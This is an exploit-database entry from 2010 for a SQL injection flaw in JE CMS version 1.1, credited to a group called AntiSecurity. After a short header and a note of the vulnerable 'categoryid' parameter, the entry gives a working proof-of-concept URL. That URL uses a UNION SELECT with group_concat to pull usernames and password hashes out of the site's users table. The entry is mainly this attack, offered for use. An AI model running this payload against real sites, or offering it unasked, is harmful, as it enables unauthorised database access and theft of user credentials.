JE CMS version 1.1 SQL Injection Vulnerability

2010-05-17T00:00:00
ID 1337DAY-ID-12276
Type zdt
Reporter AntiSecurity
Modified 2010-05-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==============================================
JE CMS version 1.1 SQL Injection Vulnerability
==============================================


==========================================================================================================================================================
 
 
  [o] JE CMS SQL Injection Vulnerability
  
       Software : JE CMS version 1.1
       Vendor   : http://joenasejes.cz.cc/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
==========================================================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?jepage=viewcategory&categoryid=[sql]
 
 
  [o] PoC
 
       http://localhost/index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users--
 
 
==========================================================================================================================================================



#  0day.today [2018-04-15]  #